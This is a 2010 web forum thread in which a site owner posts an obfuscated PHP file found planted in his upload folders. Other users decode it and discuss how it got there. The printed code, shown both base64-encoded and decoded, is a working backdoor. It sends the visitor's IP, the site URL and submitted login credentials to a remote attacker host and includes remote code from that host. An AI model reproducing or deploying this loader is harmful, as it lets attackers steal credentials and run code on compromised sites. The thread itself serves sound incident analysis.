Page 1 of 1

Help in decoding XSS Script

Posted: Tue Aug 10, 2010 12:51 am
by prasant4u
A few days ago my forum had xss attack.. i found .htaccess and two random named php file ( like base.php , create.php ) injected in my every 777 upload folders... I am curious to know what code they used.. can someone decode this code please. thanks in advance.

Code: Select all

<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0=")); ?>

Re: Help in decoding XSS Script

Posted: Tue Aug 10, 2010 12:56 am
by Mordred
Simple: replace eval with print
Also, this is not XSS, it's either compromised FTP or a compromised upload script.

Re: Help in decoding XSS Script

Posted: Tue Aug 10, 2010 1:14 am
by prasant4u
Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?

if possible plz decode some lines for me... i can't get it...

Re: Help in decoding XSS Script

Posted: Thu Aug 12, 2010 2:36 pm
by Sephern

Code: Select all

<?php
class newhttp{
var $fullurl;
var $p_url; 
var $conn_id; 
var $flushed; 
var $mode = 4; 
var $defmode; 
var $redirects = 0; 
var $binary; 
var $options; 
var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { 
	if ($this->options & STREAM_REPORT_ERRORS)
	{ 
		trigger_error($msg, E_USER_WARNING);
	}
	return false;
}
function stream_open($path, $mode, $options, $opened_path) { 
	$this->fullurl = $path; 
	$this->options = $options; 
	$this->defmode = $mode; 
	$url = parse_url($path); 
	if (empty($url['host'])) 
	{
		return $this->error('missing host name');
 	}
	$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
	if (!$this->conn_id)
	{
		return false;
	}
	if (empty($url['path'])) 
	{ 
		$url['path'] = '/';
	}
	$this->p_url = $url;
	$this->flushed = false;
	if ($mode[0] != 'r' || (strpos($mode, '+') !== false))
	{ 
		$this->mode += 2;
	}
	$this->binary = (strpos($mode, 'b') !== false); 
	$c = $this->context(); 
	if (!isset($c['method'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'method', 'GET');
	}
	if (!isset($c['header']))
	{ 
		stream_context_set_option($this->context, 'http', 'header', '');
	} 
	if (!isset($c['user_agent'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
 	} 
	if (!isset($c['content'])) 
	{
		stream_context_set_option($this->context, 'http', 'content', ''); 
	} 
	if (!isset($c['max_redirects'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'max_redirects', 5); 
	} 
	return true; 
}
function stream_close() {
	if ($this->conn_id) 
	{
		fclose($this->conn_id); 
		$this->conn_id = null;
 	} 
}
function stream_read($bytes) { 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	if (!$this->flushed && !$this->stream_flush()) 
	{ 
		return false;
	} 
	if (feof($this->conn_id)) 
	{ 
		return ''; 
	}
	$bytes = max(1,$bytes);
	if ($this->binary) 
	{ 
		return fread($this->conn_id, $bytes); 
	} 
	else 
	{ 
		return fgets($this->conn_id, $bytes); 
	} 
}
function stream_write($data) { 
	if (!$this->conn_id) 
	{ 
		return $this->error();
	} 
	if (!$this->mode & 2) 
	{ 
		return $this->error('Stream is in read-only mode'); 
	} 
	$c = $this->context(); 
	stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
	if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) 
	{ 
		return strlen($data);
	} 
	return 0; 
}
function stream_eof() { 
	if (!$this->conn_id) 
	{ 
		return true; 
	} 
	if (!$this->flushed) 
	{ 
		return false;
	} 
	return feof($this->conn_id);
}
function stream_seek($offset, $whence) { //lolwut? Bit of a pointless function? ~Sephern 
	return false; 
}
function stream_tell() { 
	return 0; 
}
function stream_flush() { 
	if ($this->flushed) 
	{ 
		return false; 
	} 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	$c = $this->context();
	$this->flushed = true; 
	$RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
	if (!empty($c['header'])) 
	{ 
		$RequestHeaders[] = $c['header'];
	} 
	if (!empty($c['content'])) 
	{ 
		if ($c['method'] == 'PUT') 
		{ 
			$RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
		} 
		else 
		{ 
			$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
		} 
		$RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close';
		if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) 
		{ 
			return false; 
		} 
		if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) 
		{ 
			return false; 
		} 
		global $http_response_header; 
		$http_response_header = fgets($this->conn_id, 300); 
		$data = rtrim($http_response_header); 
		preg_match('#.* ([0-9]+) (.*)#i', $data, $head); 
		if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) 
		{ 
			$data = rtrim(fgets($this->conn_id, 300)); 
			while (!empty($data)) 
			{ 
				if (strpos($data, 'Location: ') !== false) 
				{ 
					$new_location = trim(str_replace('Location: ', '', $data)); 
					break; 
				} 
				$data = rtrim(fgets($this->conn_id, 300));
			} 
			trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); 
			$this->stream_close(); 
			return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
		} 
		$data = rtrim(fgets($this->conn_id, 1024)); 
		while (!empty($data)) 
		{ 
			$http_response_header .= $data."\r\n"; 
			if (strpos($data,'Content-Length: ') !== false) 
			{ 
				$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); 
			} 
			elseif (strpos($data,'Date: ') !== false) 
			{ 
				$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
			} 
			elseif (strpos($data,'Last-Modified: ') !== false) 
			{ 
				$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
			} 
			$data = rtrim(fgets($this->conn_id, 1024));
		} 
		if ($head[1] >= 400) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); 
			return false; 
		} 
		if ($head[1] == 304) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); 
			return false; 
		} 
		return true; 
	}
}
function stream_stat() { 
	$this->stream_flush();
	return $this->stat; 
}
function dir_opendir($path, $options) { 
	return false; 
}
function dir_readdir() { 
return ''; 
}
function dir_rewinddir() { 
	return '';
}
function dir_closedir() { 
	return; 
}
function url_stat($path, $flags) { 
	return array(); 
}
function context() { 
	if (!$this->context) 
	{ 
		$this->context = stream_context_create();
	}	
	$c = stream_context_get_options($this->context); 
	return (isset($c['http']) ? $c['http'] : array()); 
}
if(isset($_POST["l"]) and isset($_POST["p"]))
{
	if(isset($_POST["input"]))
	{
		$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
	}
	else
	{
		$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
	}
}
else
{
	$user_auth="";
}
if(!isset($_POST["log_flg"]))
{
	$log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>='))
{
	if(ini_get('allow_url_include'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
if($rkht==1)
{
	if(ini_get('allow_url_fopen'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1)
{
	if(!@include_once(base64_decode("aHR0cDovLw==").$v))
	{
	}
}
else
{
	stream_wrapper_register('http2','newhttp');
	if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v))
	{
	}
}
?>
Decoded and tabulated for your viewing pleasure.

It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.

Re: Help in decoding XSS Script

Posted: Fri Aug 13, 2010 1:52 am
by Mordred
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.

Re: Help in decoding XSS Script

Posted: Sat Aug 14, 2010 12:12 am
by prasant4u
Thanks everyone for your help.. :) i ve disabled url_include function in server

Re: Help in decoding XSS Script

Posted: Sun Aug 15, 2010 10:12 am
by Sephern
Mordred wrote:
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?
755 is read and execute, is it not?
If files from the 'upload' folder are included, and had PHP code in, then it'd explain how it was shell'd.

Re: Help in decoding XSS Script

Posted: Mon Aug 16, 2010 3:28 am
by Mordred
I didn't say your diagnosis was wrong, only that it wasn't the only possible one.